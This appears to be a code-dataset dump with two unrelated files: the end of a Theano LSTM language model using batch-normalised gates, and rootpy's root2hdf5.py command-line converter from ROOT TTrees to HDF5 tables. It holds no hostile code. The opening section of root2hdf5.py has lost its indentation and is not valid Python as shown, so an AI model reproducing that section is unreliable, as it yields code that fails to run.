        self.params = Parameters()
        self.hiddenstates = Parameters()
        self.shared_vars = Parameters()
        n_tokens = self.data['n_tokens']
        gates = 4            # input, forget, output, cell candidate
        self.epsilon = 0.001  # numerical floor inside batch-norm std
        # Persistent hidden/cell states carried across batches,
        # shape (batch_size, n_h) for each of the two layers.
        with self.hiddenstates:
            b1_h = shared_zeros((self.hp.batch_size, self.n_h))
            b1_c = shared_zeros((self.hp.batch_size, self.n_h))
            b2_h = shared_zeros((self.hp.batch_size, self.n_h))
            b2_c = shared_zeros((self.hp.batch_size, self.n_h))
        if hp.load_model and os.path.isfile(self.filename):
            self.params.load(self.filename)
            self.shared_vars.load(self.filename + '_vars')
        else:
            with self.params:
                # Embedding matrix, also reused (transposed) as the output
                # projection in model() below.
                W_emb = shared_normal((n_tokens, self.n_h), scale=hp.init_scale)
                #W_o = shared_normal((n_h, n_tokens), scale=scale)
                W1 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
                V1 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
                b1 = shared_zeros((self.n_h*gates,))
                # Batch-norm scale/shift for layer 1's gate pre-activations.
                gamma = shared_uniform((self.n_h*gates,), range=[0.95, 1.05])
                beta = shared_zeros((self.n_h*gates,))
                W2 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
                V2 = shared_normal((self.n_h, self.n_h*gates), scale=hp.init_scale*1.5)
                b2 = shared_zeros((self.n_h*gates,))
            with self.shared_vars:
                # Running batch-norm statistics; note v_shared tracks the
                # standard deviation (sqrt of variance), not the variance.
                m_shared = shared_zeros((1, self.n_h*gates), broadcastable=(True, False))
                v_shared = shared_zeros((1, self.n_h*gates), broadcastable=(True, False))

        def lstm(X, h, c, W, U, b):
            # Standard LSTM step; the 4 gates are packed along axis 1.
            g_on = T.dot(X,W) + T.dot(h,U) + b
            i_on = T.nnet.sigmoid(g_on[:,:self.n_h])
            f_on = T.nnet.sigmoid(g_on[:,self.n_h:2*self.n_h])
            o_on = T.nnet.sigmoid(g_on[:,2*self.n_h:3*self.n_h])
            c = f_on * c + i_on * T.tanh(g_on[:,3*self.n_h:])
            h = o_on * T.tanh(c)
            return h, c

        def batch_norm(X, gamma, beta, m_shared, v_shared, test, add_updates):
            # Normalize over the batch axis; at test time use the running
            # mean/std stored in m_shared/v_shared instead.
            if X.ndim > 2:
                output_shape = X.shape
                X = X.flatten(2)
            if test is False:
                m = T.mean(X, axis=0, keepdims=True)
                v = T.sqrt(T.var(X, axis=0, keepdims=True) + self.epsilon)
                # Exponential moving average of the running statistics,
                # accumulated through add_updates across calls.
                mulfac = 1.0/1000
                if m_shared in add_updates:
                    add_updates[m_shared] = (1.0-mulfac)*add_updates[m_shared] + mulfac*m
                    add_updates[v_shared] = (1.0-mulfac)*add_updates[v_shared] + mulfac*v
                else:
                    add_updates[m_shared] = (1.0-mulfac)*m_shared + mulfac*m
                    add_updates[v_shared] = (1.0-mulfac)*v_shared + mulfac*v
            else:
                m = m_shared
                v = v_shared
            X_hat = (X - m) / v
            y = gamma*X_hat + beta
            # NOTE(review): X was rebound by flatten(2) above, so this
            # reshape branch can never trigger — confirm intent upstream.
            if X.ndim > 2:
                y = T.reshape(y, output_shape)
            return y

        def lstm_bn(X, h, c, W, U, b, gamma, beta, m, v, test, add_updates):
            # LSTM step with batch-normalized gate pre-activations.
            g_on = batch_norm(T.dot(X,W) + T.dot(h,U) + b, gamma, beta, m, v, test, add_updates)
            i_on = T.nnet.sigmoid(g_on[:,:self.n_h])
            f_on = T.nnet.sigmoid(g_on[:,self.n_h:2*self.n_h])
            o_on = T.nnet.sigmoid(g_on[:,2*self.n_h:3*self.n_h])
            c = f_on * c + i_on * T.tanh(g_on[:,3*self.n_h:])
            h = o_on * T.tanh(c)
            return h, c

        def model(x, p, sv, test, add_updates, p_dropout):
            # x: int matrix of token ids; embedded to
            # (seq_len, batch_size, emb_size).
            h0 = p.W_emb[x]  # (seq_len, batch_size, emb_size)
            h0 = dropout(h0, p_dropout)
            cost, h1, c1, h2, c2 = [0., b1_h, b1_c, b2_h, b2_c]
            # Unrolled over time; loss only accumulated after warmup_size
            # steps so the carried-over state can settle first.
            for t in xrange(0, self.hp.seq_size):
                if t >= self.hp.warmup_size:
                    # Tied input/output embedding: predict via W_emb^T.
                    pyx = softmax(T.dot(h2, T.transpose(p.W_emb)))
                    cost += T.sum(T.nnet.categorical_crossentropy(pyx, theano_one_hot(x[t], n_tokens)))
                h1, c1 = lstm_bn(h0[t], h1, c1, p.W1, p.V1, p.b1, p.gamma, p.beta, sv.m_shared, sv.v_shared, test, add_updates)
                h1 = dropout(h1, p_dropout)
                h2, c2 = lstm(h1, h2, c2, p.W2, p.V2, p.b2)
                h2 = dropout(h2, p_dropout)
            # Carry the final hidden/cell states into the next batch.
            h_updates = [(b1_h, h1), (b1_c, c1), (b2_h, h2), (b2_c, c2)]
            return cost, h_updates

        # Training graph (accumulates batch-norm updates, uses dropout)
        # and test graph (running statistics, no dropout).
        add_updates = {}
        cost, h_updates = model(self.X, self.params, self.shared_vars, False, add_updates, self.dropout)
        te_cost, te_h_updates = model(self.X, self.params, self.shared_vars, True, None, 0.0)
        add_updates_list = []
        for key, value in add_updates.iteritems():
            add_updates_list.append((key, value))
        self.compile(cost, te_cost, h_updates, te_h_updates, add_updates_list)
| mit |
kreczko/rootpy | rootpy/root2hdf5.py | 1 | 16375 | # Copyright 2012 the rootpy developers
# distributed under the terms of the GNU General Public License
"""
This module handles conversion of ROOT's TFile and
contained TTrees into HDF5 format with PyTables
"""
from __future__ import absolute_import
import os
import sys
import warnings
from pkg_resources import parse_version
import tables
TABLES_NEW_API = parse_version(tables.__version__) >= parse_version('3')
if TABLES_NEW_API:
tables_open = tables.open_file
else:
tables_open = tables.openFile
from root_numpy import tree2array, RootNumpyUnconvertibleWarning
from numpy.lib import recfunctions
from .io import root_open, TemporaryFile
from . import log; log = log[__name__]
from .extern.progressbar import ProgressBar, Bar, ETA, Percentage
from .extern.six import string_types
from .logger.utils import check_tty
from . import QROOT
__all__ = [
'tree2hdf5',
'root2hdf5',
]
def _drop_object_col(rec, warn=True):
# ignore columns of type `object` since PyTables does not support these
if rec.dtype.hasobject:
object_fields = []
fields = rec.dtype.fields
for name in rec.dtype.names:
if fields[name][0].kind == 'O':
object_fields.append(name)
if warn:
log.warning(
"ignoring unsupported object branch '{0}'".format(
name))
# NumPy 1.7.1: TypeError: Cannot change data-type for object array.
#return rec[non_object_fields]
if object_fields:
rec = recfunctions.rec_drop_fields(rec, object_fields)
return rec
def tree2hdf5(tree, hfile, group=None,
              entries=-1, selection=None,
              show_progress=False):
    """
    Convert a TTree into a HDF5 table.

    Parameters
    ----------
    tree : ROOT.TTree
        A ROOT TTree.

    hfile : string or PyTables HDF5 File
        A PyTables HDF5 File handle or string path to an existing HDF5 file.

    group : string or PyTables Group instance, optional (default=None)
        Write the table at this location in the HDF5 file.

    entries : int, optional (default=-1)
        The number of entries to read at once while converting a ROOT TTree
        into an HDF5 table. By default read the entire TTree into memory (this
        may not be desired if your TTrees are large).

    selection : string, optional (default=None)
        A ROOT selection expression to be applied on the TTree before
        conversion.

    show_progress : bool, optional (default=False)
        If True, then display and update a progress bar on stdout as the TTree
        is converted.
    """
    # Only show progress when stdout is an interactive terminal.
    show_progress = show_progress and check_tty(sys.stdout)
    if show_progress:
        widgets = [Percentage(), ' ', Bar(), ' ', ETA()]
    # Track whether we opened the HDF5 file ourselves so we know to close it.
    own_h5file = False
    if isinstance(hfile, string_types):
        hfile = tables_open(filename=hfile, mode="w", title="Data")
        own_h5file = True
    log.info("Converting tree '{0}' with {1:d} entries ...".format(
        tree.GetName(),
        tree.GetEntries()))
    if not group:
        group = hfile.root
    elif isinstance(group, string_types):
        group_where = '/' + os.path.dirname(group)
        group_name = os.path.basename(group)
        if TABLES_NEW_API:
            group = hfile.create_group(group_where, group_name,
                                       createparents=True)
        else:
            group = hfile.createGroup(group_where, group_name)
    # Never overwrite an existing table of the same name.
    if tree.GetName() in group:
        log.warning(
            "Tree '{0}' already exists "
            "in the output file".format(tree.GetName()))
        return
    total_entries = tree.GetEntries()
    pbar = None
    if show_progress and total_entries > 0:
        pbar = ProgressBar(widgets=widgets, maxval=total_entries)
    if entries <= 0:
        # read the entire tree
        if pbar is not None:
            pbar.start()
        array = tree2array(tree, selection=selection)
        array = _drop_object_col(array)
        if TABLES_NEW_API:
            table = hfile.create_table(
                group, tree.GetName(),
                array, tree.GetTitle())
        else:
            table = hfile.createTable(
                group, tree.GetName(),
                array, tree.GetTitle())
        # flush data in the table
        table.flush()
        # flush all pending data
        hfile.flush()
    else:
        # read the tree in chunks
        start = 0
        # The `or start == 0` clause guarantees one pass even for an
        # empty tree so the (empty) table still gets created below.
        while start < total_entries or start == 0:
            if start > 0:
                # Subsequent chunks: the table exists, append to it and
                # silence warnings already emitted for the first chunk.
                with warnings.catch_warnings():
                    warnings.simplefilter(
                        "ignore",
                        RootNumpyUnconvertibleWarning)
                    warnings.simplefilter(
                        "ignore",
                        tables.NaturalNameWarning)
                    array = tree2array(
                        tree,
                        selection=selection,
                        start=start,
                        stop=start + entries)
                array = _drop_object_col(array, warn=False)
                table.append(array)
            else:
                # First chunk: convert it and create the output table.
                array = tree2array(
                    tree,
                    selection=selection,
                    start=start,
                    stop=start + entries)
                array = _drop_object_col(array)
                if pbar is not None:
                    # start after any output from root_numpy
                    pbar.start()
                if TABLES_NEW_API:
                    table = hfile.create_table(
                        group, tree.GetName(),
                        array, tree.GetTitle())
                else:
                    table = hfile.createTable(
                        group, tree.GetName(),
                        array, tree.GetTitle())
            start += entries
            if start <= total_entries and pbar is not None:
                pbar.update(start)
        # flush data in the table
        table.flush()
        # flush all pending data
        hfile.flush()
    if pbar is not None:
        pbar.finish()
    if own_h5file:
        hfile.close()
def root2hdf5(rfile, hfile, rpath='',
              entries=-1, userfunc=None,
              selection=None,
              show_progress=False,
              ignore_exception=False):
    """
    Convert all trees in a ROOT file into tables in an HDF5 file.

    Parameters
    ----------
    rfile : string or asrootpy'd ROOT File
        A ROOT File handle or string path to an existing ROOT file.
    hfile : string or PyTables HDF5 File
        A PyTables HDF5 File handle or string path to an existing HDF5 file.
    rpath : string, optional (default='')
        Top level path to begin traversal through the ROOT file. By default
        convert everything in and below the root directory.
    entries : int, optional (default=-1)
        The number of entries to read at once while converting a ROOT TTree
        into an HDF5 table. By default read the entire TTree into memory (this
        may not be desired if your TTrees are large).
    userfunc : callable, optional (default=None)
        A function that will be called on every tree and that must return a
        tree or list of trees that will be converted instead of the original
        tree.
    selection : string, optional (default=None)
        A ROOT selection expression to be applied on all trees before
        conversion.
    show_progress : bool, optional (default=False)
        If True, then display and update a progress bar on stdout as each tree
        is converted.
    ignore_exception : bool, optional (default=False)
        If True, then ignore exceptions raised in converting trees and instead
        skip such trees.
    """
    # Only close handles that this function opened itself.
    close_root = False
    close_h5 = False
    if isinstance(rfile, string_types):
        rfile = root_open(rfile)
        close_root = True
    if isinstance(hfile, string_types):
        hfile = tables_open(filename=hfile, mode="w", title="Data")
        close_h5 = True
    for dir_path, _, tree_names in rfile.walk(
            rpath, class_ref=QROOT.TTree):
        if not tree_names:
            # no trees in this directory; nothing to convert
            continue
        tree_names.sort()
        parent_where = '/' + os.path.dirname(dir_path)
        node_name = os.path.basename(dir_path)
        if not node_name:
            # top-level trees go directly under the HDF5 root group
            group = hfile.root
        else:
            # mirror the ROOT directory as an HDF5 group
            if TABLES_NEW_API:
                group = hfile.create_group(parent_where, node_name,
                                           createparents=True)
            else:
                group = hfile.createGroup(parent_where, node_name)
        n_trees = len(tree_names)
        log.info(
            "Will convert {0:d} tree{1} in {2}".format(
                n_trees, 's' if n_trees != 1 else '',
                os.path.join(parent_where, node_name)))
        for tree_name in tree_names:
            src_tree = rfile.Get(os.path.join(dir_path, tree_name))
            scratch = None
            to_convert = [src_tree]
            if userfunc is not None:
                # user-produced trees are written into a temporary ROOT file
                scratch = TemporaryFile()
                # call user-defined function on tree and get output trees
                log.info("Calling user function on tree '{0}'".format(
                    src_tree.GetName()))
                produced = userfunc(src_tree)
                to_convert = (produced if isinstance(produced, list)
                              else [produced])
            for tree in to_convert:
                try:
                    tree2hdf5(tree, hfile, group=group,
                              entries=entries, selection=selection,
                              show_progress=show_progress)
                except Exception as e:
                    if not ignore_exception:
                        raise
                    log.error("Failed to convert tree '{0}': {1}".format(
                        tree.GetName(), str(e)))
            # free ROOT-side memory for the input tree
            src_tree.Delete()
            if userfunc is not None:
                for tree in to_convert:
                    tree.Delete()
                scratch.Close()
    if close_h5:
        hfile.close()
    if close_root:
        rfile.Close()
def main():
    """Command-line entry point: convert ROOT files into HDF5 files.

    Parses command-line options, then converts each input ROOT file listed
    on the command line into an HDF5 file of the same base name via
    ``root2hdf5``. Exits with a nonzero status on fatal errors.
    """
    import rootpy
    from rootpy.extern.argparse import (
        ArgumentParser,
        ArgumentDefaultsHelpFormatter, RawTextHelpFormatter)

    # combine default-showing and raw-text help formatting
    class formatter_class(ArgumentDefaultsHelpFormatter,
                          RawTextHelpFormatter):
        pass
    parser = ArgumentParser(formatter_class=formatter_class,
        description="Convert ROOT files containing TTrees into HDF5 files "
                    "containing HDF5 tables")
    parser.add_argument('--version', action='version',
                        version=rootpy.__version__,
                        help="show the version number and exit")
    parser.add_argument('-n', '--entries', type=int, default=100000,
                        help="number of entries to read at once")
    parser.add_argument('-f', '--force', action='store_true', default=False,
                        help="overwrite existing output files")
    parser.add_argument('-u', '--update', action='store_true', default=False,
                        help="update existing output files")
    parser.add_argument('--ext', default='h5',
                        help="output file extension")
    parser.add_argument('-c', '--complevel', type=int, default=5,
                        choices=range(0, 10),
                        help="compression level")
    parser.add_argument('-l', '--complib', default='zlib',
                        choices=('zlib', 'lzo', 'bzip2', 'blosc'),
                        help="compression algorithm")
    parser.add_argument('-s', '--selection', default=None,
                        help="apply a selection on each "
                             "tree with a cut expression")
    parser.add_argument(
        '--script', default=None,
        help="Python script containing a function with the same name \n"
             "that will be called on each tree and must return a tree or \n"
             "list of trees that will be converted instead of the \n"
             "original tree")
    parser.add_argument('-q', '--quiet', action='store_true', default=False,
                        help="suppress all warnings")
    parser.add_argument('-d', '--debug', action='store_true', default=False,
                        help="show stack trace in the event of "
                             "an uncaught exception")
    parser.add_argument('--no-progress-bar', action='store_true', default=False,
                        help="do not show the progress bar")
    parser.add_argument('--ignore-exception', action='store_true',
                        default=False,
                        help="ignore exceptions raised in converting trees "
                             "and instead skip such trees")
    parser.add_argument('files', nargs='+')
    args = parser.parse_args()

    rootpy.log.basic_config_colorized()
    import logging
    if hasattr(logging, 'captureWarnings'):
        logging.captureWarnings(True)

    # show warnings as a single "Category: message" line
    def formatwarning(message, category, filename, lineno, line=None):
        return "{0}: {1}".format(category.__name__, message)
    warnings.formatwarning = formatwarning
    args.ext = args.ext.strip('.')
    if args.quiet:
        warnings.simplefilter(
            "ignore",
            RootNumpyUnconvertibleWarning)
        warnings.simplefilter(
            "ignore",
            tables.NaturalNameWarning)

    userfunc = None
    if args.script is not None:
        # get user-defined function
        # BUG FIX: exec the script into a dedicated namespace dict. The
        # previous exec(..., globals(), locals()) pattern fails on Python 3:
        # names that exec writes into the locals() snapshot never become real
        # function locals, so a later locals()[funcname] lookup always raises
        # KeyError even when the script defines the function.
        script_namespace = {}
        try:
            exec(compile(open(args.script).read(), args.script, 'exec'),
                 script_namespace)
        except IOError:
            sys.exit('Could not open script {0}'.format(args.script))
        # the function must share the script's base file name
        funcname = os.path.splitext(os.path.basename(args.script))[0]
        try:
            userfunc = script_namespace[funcname]
        except KeyError:
            sys.exit(
                "Could not find the function '{0}' in the script {1}".format(
                    funcname, args.script))

    for inputname in args.files:
        outputname = os.path.splitext(inputname)[0] + '.' + args.ext
        output_exists = os.path.exists(outputname)
        if output_exists and not (args.force or args.update):
            sys.exit(
                "Output {0} already exists. "
                "Use the --force option to overwrite it".format(outputname))
        try:
            rootfile = root_open(inputname)
        except IOError:
            sys.exit("Could not open {0}".format(inputname))
        try:
            # complevel 0 means no compression at all
            if args.complevel > 0:
                filters = tables.Filters(complib=args.complib,
                                         complevel=args.complevel)
            else:
                filters = None
            hd5file = tables_open(filename=outputname,
                                  mode='a' if args.update else 'w',
                                  title='Data', filters=filters)
        except IOError:
            sys.exit("Could not create {0}".format(outputname))
        try:
            log.info("Converting {0} ...".format(inputname))
            root2hdf5(rootfile, hd5file,
                      entries=args.entries,
                      userfunc=userfunc,
                      selection=args.selection,
                      show_progress=not args.no_progress_bar,
                      ignore_exception=args.ignore_exception)
            log.info("{0} {1}".format(
                "Updated" if output_exists and args.update else "Created",
                outputname))
        except KeyboardInterrupt:
            log.info("Caught Ctrl-c ... cleaning up")
            hd5file.close()
            rootfile.Close()
            if not output_exists:
                # don't leave a partial output file behind
                log.info("Removing {0}".format(outputname))
                os.unlink(outputname)
            sys.exit(1)
        except Exception as e:
            if args.debug:
                # If in debug mode show full stack trace
                import traceback
                traceback.print_exception(*sys.exc_info())
            log.error(str(e))
            sys.exit(1)
        finally:
            hd5file.close()
            rootfile.Close()
| gpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.